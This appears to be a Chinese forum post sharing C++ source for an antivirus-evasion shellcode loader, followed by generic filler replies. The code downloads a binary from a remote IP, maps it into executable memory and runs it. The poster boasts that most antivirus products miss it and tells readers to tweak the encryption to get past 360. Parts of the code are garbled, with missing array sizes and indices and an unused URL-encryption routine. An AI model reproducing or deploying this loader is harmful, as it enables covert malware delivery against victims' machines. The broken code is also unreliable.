免杀加载器C++代码源码
原理:加密URL 加密shellcode
解密URL 打开指定URL下载的bin二进制文件
读取bin中的数据,进行加密
申请一块内存,解密数据复制到内存中
执行内存中的shellcode
释放内存
(大概就是这些,刚做出来的时候,用了一个星期。360已经特征杀了,其他杀毒一直没报。很稳定,要过360的自己改改加密或者改改内存执行方式就可以过)
请勿用与非法活动!这个代码只仅供参考学习价值!否则后果自负!
换成o
#include <Windows.h>
#include <WinINet.h>
#include <iostream>
#include <string>
#include <Shlwapi.h>
#include <bcrypt.h>
#include <wincrypt.h>
#include <vector>
#include <sstream>
#include <iomanip>
#include <ntstatus.h>
#pragma comment(lib, "Wininet.lib")
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif
// Base64编码
std::string base64_encode(const std::vector<BYTE>& data) {
static const char base64_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
std::string ret;
int i = 0, j = 0;
BYTE char_array_3, char_array_4;
for (auto byte : data) {
char_array_3 = byte;
if (i == 3) {
char_array_4 = (char_array_3 & 0xfc) >> 2;
char_array_4 = ((char_array_3 & 0x03) << 4) + ((char_array_3 & 0xf0) >> 4);
char_array_4 = ((char_array_3 & 0x0f) << 2) + ((char_array_3 & 0xc0) >> 6);
char_array_4 = char_array_3 & 0x3f;
for (i = 0; i < 4; i++) {
ret += base64_chars];
}
i = 0;
}
}
if (i) {
for (j = i; j < 3; j++) {
char_array_3 = '\0';
}
char_array_4 = (char_array_3 & 0xfc) >> 2;
char_array_4 = ((char_array_3 & 0x03) << 4) + ((char_array_3 & 0xf0) >> 4);
char_array_4 = ((char_array_3 & 0x0f) << 2) + ((char_array_3 & 0xc0) >> 6);
char_array_4 = char_array_3 & 0x3f;
for (j = 0; j < i + 1; j++) {
ret += base64_chars];
}
while (i++ < 3) {
ret += '=';
}
}
return ret;
}
std::string url_encode(const std::string& str) {
std::ostringstream escaped;
escaped.fill('0');
escaped << std::hex;
for (auto c : str) {
if (std::isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
escaped << c;
}
else {
escaped << std::uppercase;
escaped << '%' << std::setw(2) << int((unsigned char)c);
escaped << std::nouppercase;
}
}
return escaped.str();
}
std::string encrypt_url(const std::string& url) {
std::string param = "param=123456";
std::vector<BYTE> data(param.begin(), param.end());
BCRYPT_ALG_HANDLE hAlg = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_RNG_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
BYTE key = { 0 };
if (BCryptGenRandom(hAlg, key, sizeof(key), 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptCloseAlgorithmProvider(hAlg, 0);
BCRYPT_KEY_HANDLE hKey = NULL;
if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0) != STATUS_SUCCESS) {
return "";
}
ULONG cbKeyObject = 0, cbData = 0, cbBlockLen = 0;
if (BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbKeyObject, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
if (BCryptGetProperty(hAlg, BCRYPT_BLOCK_LENGTH, (PBYTE)&cbBlockLen, sizeof(ULONG), &cbData, 0) != STATUS_SUCCESS) {
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BYTE* pbKeyObject = new BYTE;
if (BCryptGenerateSymmetricKey(hAlg, &hKey, pbKeyObject, cbKeyObject, key, sizeof(key), 0) != STATUS_SUCCESS) {
delete[] pbKeyObject;
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
delete[] pbKeyObject;
// 填充数据
size_t padding = cbBlockLen - (data.size() % cbBlockLen);
if (padding > 0) {
data.resize(data.size() + padding, (BYTE)padding);
}
// 加密数据
ULONG cbCipherText = (ULONG)data.size() + cbBlockLen;
BYTE* pbCipherText = new BYTE;
memset(pbCipherText, 0, cbCipherText);
if (BCryptEncrypt(hKey, data.data(), (ULONG)data.size(), NULL, NULL, 0, pbCipherText, cbCipherText, &cbData, 0) != STATUS_SUCCESS) {
delete[] pbCipherText;
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
return "";
}
BCryptDestroyKey(hKey);
BCryptCloseAlgorithmProvider(hAlg, 0);
// 将密钥和密文进行Base64编码和URL编码
std::string encoded_key = base64_encode(std::vector<BYTE>(key, key + sizeof(key)));
std::string encoded_data = base64_encode(std::vector<BYTE>(pbCipherText, pbCipherText + cbData));
std::string encoded_url = url + "?" + param.substr(0, param.find("=") + 1) + url_encode(encoded_data) + "&key=" + url_encode(encoded_key);
// 清理内存
delete[] pbCipherText;
return encoded_url;
}
int main() {
std::wstring url = L"http://xxx.92.32.137/Client.bin";
HINTERNET hInternet = InternetOpenW(L"Download", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if (hInternet == NULL) {
std::cout << "Failed to initialize WinINet." << std::endl;
return 1;
}
HINTERNET hUrl = InternetOpenUrlW(hInternet, url.c_str(), NULL, 0, INTERNET_FLAG_RELOAD | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_NO_CACHE_WRITE, 0);
if (hUrl == NULL) {
std::cout << "Failed to open URL." << std::endl;
InternetCloseHandle(hInternet);
return 1;
}
DWORD file_size = 0;
DWORD length = sizeof(file_size);
if (!HttpQueryInfoW(hUrl, HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER, &file_size, &length, NULL)) {
std::cout << "Failed to get file size." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
LPVOID lpAddress = VirtualAlloc(NULL, file_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (lpAddress == NULL) {
std::cout << "Failed to allocate memory." << std::endl;
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
DWORD bytes_read = 0;
if (!InternetReadFile(hUrl, lpAddress, file_size, &bytes_read)) {
std::cout << "Failed to read file." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
return 1;
}
InternetCloseHandle(hUrl);
InternetCloseHandle(hInternet);
// 通过VirtualProtect将内存页属性设置为可执行
DWORD old_protect = 0;
if (!VirtualProtect(lpAddress, file_size, PAGE_EXECUTE_READ, &old_protect)) {
std::cout << "Failed to set memory page protection." << std::endl;
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 1;
}
// 执行内存中的代码
((void(*)())lpAddress)();
// 释放内存
VirtualFree(lpAddress, 0, MEM_RELEASE);
return 0;
}
纯粹路过,没任何兴趣,仅仅是看在老用户份上回复一下 我也是坐沙发的 刚起床,睁开眼就看到楼主的帖子了,顶一下! 在乎的人不明白,明白的人不在乎。 我们走得太快,灵魂都跟不上了…… 和你擦肩而过你却不知道是我,因为我把头扭过去了。 楼主,么么哒! 非常好,顶一下 好好顶贴,天天向上!